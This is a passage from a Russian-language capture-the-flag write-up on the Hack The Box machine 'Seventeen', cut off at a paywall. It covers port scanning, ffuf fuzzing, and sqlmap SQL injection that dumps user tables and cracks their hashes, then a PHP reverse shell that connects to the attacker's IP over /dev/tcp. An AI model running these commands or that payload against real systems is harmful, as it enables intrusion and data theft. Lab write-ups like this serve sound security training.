В этом рай­тапе я покажу, как соз­дать свой реестр NPM и раз­местить с ним вре­донос­ный пакет для зах­вата уда­лен­ной машины. Но нач­нем мы с SQL-инъ­екции, а затем заюзаем извес­тную RCE для повыше­ния при­виле­гий.

На­ша цель — зах­ват машины Seventeen с тре­ниро­воч­ной пло­щад­ки Hack The Box. Задание оце­нено как слож­ное.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.165 seventeen.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та.

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ви­дим три откры­тых пор­та:

  • 22 — служ­ба OpenSSH 7.6p1;
  • 80 — веб‑сер­вер Apache 2.4.29;
  • 8000 — веб‑сер­вер Apache 2.4.38.

Нам дос­тупно сра­зу два веб‑сер­вера, с которых и нач­нем про­бивать периметр.

Главная страница сайта
Глав­ная стра­ница сай­та

Ос­мотрев­шись на сай­те, находим под­твержде­ние тому, что в самом начале выб­рали вер­ное домен­ное имя.

Лендинг
Лен­динг

Боль­ше ничего инте­рес­ного нет, поэто­му перей­дем к активно­му ска­ниро­ванию.

 

Точка входа

Итак, я поп­робую поис­кать скры­тые фай­лы и катало­ги. Делать это я буду при помощи ска­нера ffuf.

Справка: сканирование веба c ffuf

Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB.

Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры:

  • -w — сло­варь (я исполь­зую сло­вари из набора SecLists);
  • -t — количес­тво потоков;
  • -u — URL;
  • -fc — исклю­чить из резуль­тата отве­ты с кодом 403.
ffuf -u 'http://seventeen.htb/FUZZ' -t 256 -w directory_2.3_medium_lowercase.txt
Результат сканирования каталогов с помощью ffuf
Ре­зуль­тат ска­ниро­вания катало­гов с помощью ffuf

Ска­ниро­вание катало­гов ничего инте­рес­ного не дало. Дру­гих HTML-стра­ниц тоже не наш­лось. Оста­ется прос­каниро­вать под­домены. В этом слу­чае мы будем переби­рать заголо­вок Host в парамет­ре -H. Так как все отве­ты будут вес­ти на основной домен, можем их отфиль­тро­вать по раз­меру стра­ницы в парамет­ре --fs.

ffuf -u 'http://seventeen.htb/' -t 256 -w subdomains-top1million-110000.txt -H 'Host: FUZZ.seventeen.htb' --fs 20689
Результат сканирования поддоменов
Ре­зуль­тат ска­ниро­вания под­доменов

На­ходим один под­домен, запись для которо­го добав­ляем в /etc/hosts.

10.10.11.165 seventeen.htb exam.seventeen.htb
Главная страница сайта exam.seventeen.htb
Глав­ная стра­ница сай­та exam.seventeen.htb
 

Exam Reviewer Management System

На сай­те нас встре­чает Exam Reviewer Management System, для которой мы лег­ко находим пуб­личный экс­пло­ит в базе Exploit-DB. Это SQL-инъ­екция.

Описание способа эксплуатации
Опи­сание спо­соба экс­плу­ата­ции

Нам пре­дос­тавля­ют готовую наг­рузку, которой неп­ремен­но сто­ит вос­поль­зовать­ся. Пер­вым делом запус­тим sqlmap.

sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --level 3
Рабочая нагрузка для эксплуатации
Ра­бочая наг­рузка для экс­плу­ата­ции

Sqlmap нашел наг­рузку, теперь получим базы дан­ных (параметр --dbs).

sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --dbs --level 3
Базы данных
Ба­зы дан­ных

От­меча­ем для себя, что на сер­вере исполь­зуют­ся и дру­гие плат­формы, вклю­чая Roundcube. Нач­нем с пер­вой базы, получим таб­лицы (параметр --tables) из базы db_sfms (параметр -D).

sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -D db_sfms --tables
Таблицы в базе db_sfms
Таб­лицы в базе db_sfms

Да­вай сдам­пим (параметр --dump) таб­лицы user и student (параметр -T). Для быс­тро­ты исполь­зуем десять потоков (параметр --threads).

sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D db_sfms -T user --dump
Содержимое таблицы user
Со­дер­жимое таб­лицы user
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D db_sfms -T student --dump
Содержимое таблицы student
Со­дер­жимое таб­лицы student

По­лучи­ли мно­го хешей, что не может не радовать. Теперь перей­дем к базе erms_db и по при­выч­ному сце­нарию сна­чала узна­ем таб­лицы.

sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D erms_db --tables
Таблицы в базе erms_db
Таб­лицы в базе erms_db

Из этой базы тоже сдам­пим поль­зовате­лей.

sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D erms_db -T users --dump
Содержимое таблицы user
Со­дер­жимое таб­лицы user

Кро­ме хешей, мы рас­кры­ваем каталог с ава­тара­ми, а это неиз­вес­тная до дан­ного момен­та дирек­тория на веб‑сер­вере — /oldmanagement! Из Roundcube ничего не получа­ем, поэто­му с помощью онлай­новой базы кря­каем хеши.

Взлом хешей
Взлом хешей

По­луча­ем один пароль, с которым поп­робу­ем пой­ти на най­ден­ный сайт — School File Management System.

Сайт seventeen.htb:8000/oldmanagement
Сайт seventeen.htb:8000/oldmanagement
 

Точка опоры

Пос­ле авто­риза­ции видим заг­ружен­ный файл, который мы, конеч­но же, ска­чаем.

Профиль пользователя Kelly
Про­филь поль­зовате­ля Kelly

Нем­ного почитав про эту сис­тему, я узнал о воз­можнос­ти заг­рузить и выпол­нить файл на PHP. Файл будет рас­положен в катало­ге /files/31234/. В качес­тве реверс‑шел­ла заг­ружа­ем прос­той скрипт:

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.16/4321 0>&1'"); ?>
Список загруженных файлов
Спи­сок заг­ружен­ных фай­лов

Об­раща­емся к нашему скрип­ту по сле­дующе­му адре­су:

http://seventeen.htb:8000/oldmanagement/files/31234/reverse.php

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Вариант 2. Открой один материал

Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.


Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии